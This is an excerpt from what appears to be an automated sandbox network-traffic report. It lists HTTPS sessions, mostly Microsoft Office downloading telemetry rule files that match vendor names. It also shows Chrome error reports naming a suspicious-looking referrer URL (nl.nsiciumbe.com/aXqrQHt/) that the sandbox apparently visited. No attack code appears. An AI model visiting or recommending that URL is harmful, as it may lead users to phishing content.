                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    61192.168.2.44981713.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:51 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:52 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:52 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 486
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                    ETag: "0x8DC582BB344914B"
                                                    x-ms-request-id: 5fd12e2e-e01e-0051-1fc8-3e84b2000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184452Z-178bfbc474bmqmgjhC1NYCy16c0000000810000000001guy
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:52 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    62192.168.2.44982235.190.80.14432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:51 UTC481OUTPOST /report/v4?s=QenT1uH9OoSpHete%2BQQiHKTgNBfukx%2FXYGk9UxFsUG0WGJfkaYgxdBu1LuP5yZqNoShH%2FqyOiZVX3xU8FGE9TzExwaq%2Bx5dVMm8zIX5qZLYGahygqYm9twgG1mKZONogb0Y%3D HTTP/1.1
                                                    Host: a.nel.cloudflare.com
                                                    Connection: keep-alive
                                                    Content-Length: 1277
                                                    Content-Type: application/reports+json
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:44:51 UTC1277OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 32 32 32 35 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 30 34 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 38 39 2e 37 34 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 79 61 6e 63 65 73 79 62 72 6f 73
                                                    Data Ascii: [{"age":52225,"body":{"elapsed_time":3048,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"172.67.189.74","status_code":404,"type":"http.error"},"type":"network-error","url":"https://yancesybros
                                                    2024-11-25 18:44:52 UTC168INHTTP/1.1 200 OK
                                                    Content-Length: 0
                                                    date: Mon, 25 Nov 2024 18:44:52 GMT
                                                    Via: 1.1 google
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    63192.168.2.44981913.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:52 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:52 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:52 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 486
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                    ETag: "0x8DC582B9018290B"
                                                    x-ms-request-id: aff2abcc-f01e-0003-4547-3c4453000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184452Z-178bfbc474bfw4gbhC1NYCunf400000007w000000000bgpy
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:52 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    64192.168.2.44981813.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:52 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:52 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:52 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 427
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                    ETag: "0x8DC582BA310DA18"
                                                    x-ms-request-id: 922c5f4e-601e-005c-577c-3bf06f000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184452Z-174c587ffdfmlsmvhC1TEBvyks00000006e000000000kz6k
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:52 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    65192.168.2.44982335.190.80.14432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:52 UTC484OUTPOST /report/v4?s=Ek%2F%2FV9upZKQuA%2FRHsyDfpn47ZTf5WV0rEtxgVmOKzFXP3eAKsy%2B33ZlWUTfyyBQAA9MB2qhwLMuHT0x11KU2PV%2Bf8Q9z%2FlueFzpcogQmGAuYAq%2BQhWFzbFEQjmxBwg%3D%3D HTTP/1.1
                                                    Host: a.nel.cloudflare.com
                                                    Connection: keep-alive
                                                    Content-Length: 432
                                                    Content-Type: application/reports+json
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:44:52 UTC432OUTData Raw: 5b 7b 22 61 67 65 22 3a 39 37 37 37 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 35 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6e 6c 2e 6e 73 69 63 69 75 6d 62 65 2e 63 6f 6d 2f 61 58 71 72 51 48 74 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 36 33 2e 32 37 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72
                                                    Data Ascii: [{"age":9777,"body":{"elapsed_time":355,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://nl.nsiciumbe.com/aXqrQHt/","sampling_fraction":1.0,"server_ip":"104.21.63.27","status_code":404,"type":"http.error"},"type":"network-err
                                                    2024-11-25 18:44:52 UTC168INHTTP/1.1 200 OK
                                                    Content-Length: 0
                                                    date: Mon, 25 Nov 2024 18:44:52 GMT
                                                    Via: 1.1 google
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    66192.168.2.44982013.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:52 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:52 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:52 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 407
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                    ETag: "0x8DC582B9698189B"
                                                    x-ms-request-id: b82db720-b01e-0053-528c-3acdf8000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184452Z-174c587ffdfmlsmvhC1TEBvyks00000006f000000000dgt6
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:52 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    67192.168.2.44982413.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:54 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:54 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:54 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 469
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                    ETag: "0x8DC582BBA701121"
                                                    x-ms-request-id: ce6e3a8c-101e-0017-74b5-3e47c7000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184454Z-178bfbc474bwlrhlhC1NYCy3kg00000007sg00000000ry6s
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:54 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    68192.168.2.44982613.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:54 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:54 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:54 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 477
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                    ETag: "0x8DC582BB8CEAC16"
                                                    x-ms-request-id: 4834b854-301e-005d-3ab8-3ee448000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184454Z-174c587ffdf59vqchC1TEByk6800000006c000000000u3fg
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:54 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    69192.168.2.44982513.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:54 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:54 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:54 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 415
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                    ETag: "0x8DC582BA41997E3"
                                                    x-ms-request-id: 21648528-e01e-003c-794e-3cc70b000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184454Z-178bfbc474bh5zbqhC1NYCkdug00000007tg00000000bqcq
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:54 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    70192.168.2.44982713.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:54 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:54 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:54 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 464
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                    ETag: "0x8DC582B97FB6C3C"
                                                    x-ms-request-id: 3257ccc0-201e-005d-19b5-3eafb3000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184454Z-178bfbc474b7cbwqhC1NYC8z4n00000007vg000000002e88
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:54 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    71192.168.2.44982813.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:54 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:54 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:54 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 494
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                    ETag: "0x8DC582BB7010D66"
                                                    x-ms-request-id: e328efd5-c01e-00a2-56bf-3e2327000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184454Z-178bfbc474bh5zbqhC1NYCkdug00000007r000000000p28t
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:54 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    72192.168.2.44982913.107.246.63443
